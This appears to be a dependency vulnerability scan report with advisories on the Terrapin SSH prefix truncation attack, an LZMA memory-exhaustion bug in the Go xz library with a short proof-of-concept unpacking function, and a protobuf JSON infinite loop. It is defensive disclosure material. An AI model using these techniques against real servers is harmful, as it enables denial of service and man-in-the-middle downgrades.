Terrapin is a prefix truncation attack targeting the SSH protocol. More precisely, Terrapin breaks the integrity of SSH's secure channel. By carefully adjusting the sequence numbers during the handshake, an attacker can remove an arbitrary amount of messages sent by the client or server at the beginning of the secure channel without the client or server noticing it.
Mitigations
To mitigate this protocol vulnerability, OpenSSH suggested a so-called "strict kex" which alters the SSH handshake to ensure a Man-in-the-Middle attacker cannot introduce unauthenticated messages as well as convey sequence number manipulation across handshakes.
Warning: To take effect, both the client and server must support this countermeasure.
As a stop-gap measure, peers may also (temporarily) disable the affected algorithms and use unaffected alternatives like AES-GCM instead until patches are available.
Details
The SSH specifications of ChaCha20-Poly1305 (chacha20-poly1305@openssh.com) and Encrypt-then-MAC (*-etm@openssh.com MACs) are vulnerable against an arbitrary prefix truncation attack (a.k.a. Terrapin attack). This allows for an extension negotiation downgrade by stripping the SSH_MSG_EXT_INFO sent after the first message after SSH_MSG_NEWKEYS, downgrading security, and disabling attack countermeasures in some versions of OpenSSH. When targeting Encrypt-then-MAC, this attack requires the use of a CBC cipher to be practically exploitable due to the internal workings of the cipher mode. Additionally, this novel attack technique can be used to exploit previously unexploitable implementation flaws in a Man-in-the-Middle scenario.
The attack works by an attacker injecting an arbitrary number of SSH_MSG_IGNORE messages during the initial key exchange and consequently removing the same number of messages just after the initial key exchange has concluded. This is possible due to missing authentication of the excess SSH_MSG_IGNORE messages and the fact that the implicit sequence numbers used within the SSH protocol are only checked after the initial key exchange.
In the case of ChaCha20-Poly1305, the attack is guaranteed to work on every connection as this cipher does not maintain an internal state other than the message's sequence number. In the case of Encrypt-Then-MAC, practical exploitation requires the use of a CBC cipher; while theoretical integrity is broken for all ciphers when using this mode, message processing will fail at the application layer for CTR and stream ciphers.
For more details see https://terrapin-attack.com.
Impact
This attack targets the specification of ChaCha20-Poly1305 (chacha20-poly1305@openssh.com) and Encrypt-then-MAC (*-etm@openssh.com), which are widely adopted by well-known SSH implementations and can be considered de-facto standard. These algorithms can be practically exploited; however, in the case of Encrypt-Then-MAC, we additionally require the use of a CBC cipher. As a consequence, this attack works against all well-behaving SSH implementations supporting either of those algorithms and can be used to downgrade (but not fully strip) connection security in case SSH extension negotiation (RFC8308) is supported. The attack may also enable attackers to exploit certain implementation flaws in a man-in-the-middle (MitM) scenario.
|
github.com/ulikunitz/xz 0.5.8 (golang)
pkg:golang/github.com/ulikunitz/xz@0.5.8
Allocation of Resources Without Limits or Throttling
| Affected range | <=0.5.13 | | Fixed version | 0.5.14 | | CVSS Score | 5.3 | | CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L | | EPSS Score | 0.058% | | EPSS Percentile | 18th percentile |
Description
Summary
It is possible to put data in front of an LZMA-encoded byte stream without detecting the situation while reading the header. This can lead to increased memory consumption because the current implementation allocates the full decoding buffer directly after reading the header. The LZMA header doesn't include a magic number or has a checksum to detect such an issue according to the specification.
Note that the code recognizes the issue later while reading the stream, but at this time the memory allocation has already been done.
Mitigations
The release v0.5.15 includes following mitigations:
- The ReaderConfig DictCap field is now interpreted as a limit for the dictionary size.
- The default is 2 Gigabytes - 1 byte (2^31-1 bytes).
- Users can check with the [Reader.Header] method what the actual values are in their LZMA files and set a smaller limit using ReaderConfig.
- The dictionary size will not exceed the larger of the file size and the minimum dictionary size. This is another measure to prevent huge memory allocations for the dictionary.
- The code supports stream sizes only up to a pebibyte (1024^5).
Note that the original v0.5.14 version had a compiler error for 32 bit platforms, which has been fixed by v0.5.15.
Methods affected
Only software that uses lzma.NewReader or lzma.ReaderConfig.NewReader is affected. There is no issue for software using the xz functionality.
I thank @GregoryBuligin for his report, which is provided below.
Summary
When unpacking a large number of LZMA archives, even in a single goroutine, if the first byte of the archive file is 0 (a zero byte added to the beginning), an error writeMatch: distance out of range occurs. Memory consumption spikes sharply, and the GC clearly cannot handle this situation.
Details
Judging by the error writeMatch: distance out of range, the problems occur in the code around this function.
https://github.com/ulikunitz/xz/blob/c8314b8f21e9c5e25b52da07544cac14db277e89/lzma/decoderdict.go#L81
PoC
Run a function similar to this one in 1 or several goroutines on a multitude of LZMA archives that have a 0 (a zero byte) added to the beginning.
const ProjectLocalPath = "some/path" const TmpDir = "tmp"
func UnpackLZMA(lzmaFile string) error { file, err := os.Open(lzmaFile) if err != nil { return err } defer file.Close()
reader, err := lzma.NewReader(bufio.NewReader(file)) if err != nil { return err }
tmpFile, err := os.CreateTemp(TmpDir, TmpLZMAPrefix) if err != nil { return err } defer func() { tmpFile.Close() _ = os.Remove(tmpFile.Name()) }()
sha256Hasher := sha256.New() multiWriter := io.MultiWriter(tmpFile, sha256Hasher)
if _, err = io.Copy(multiWriter, reader); err != nil { return err }
unpackHash := hex.EncodeToString(sha256Hasher.Sum(nil)) unpackDir := filepath.Join( ProjectLocalPath, unpackHash[:2], ) _ = os.MkdirAll(unpackDir, DirPerm)
unpackPath := filepath.Join(unpackDir, unpackHash)
return os.Rename(tmpFile.Name(), unpackPath) }
Impact
Servers with a small amount of RAM that download and unpack a large number of unverified LZMA archives
|
google.golang.org/protobuf 1.28.1 (golang)
pkg:golang/google.golang.org/protobuf@1.28.1
Loop with Unreachable Exit Condition ('Infinite Loop')
| Affected range | <1.33.0 | | Fixed version | 1.33.0 | | CVSS Score | 6.6 | | CVSS Vector | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U | | EPSS Score | 0.231% | | EPSS Percentile | 46th percentile |
Description
The protojson.Unmarshal function can enter an infinite loop when unmarshaling certain forms of invalid JSON. This condition can occur when unmarshaling into a message which contains a google.protobuf.Any value, or when the UnmarshalOptions.DiscardUnknown option is set.
|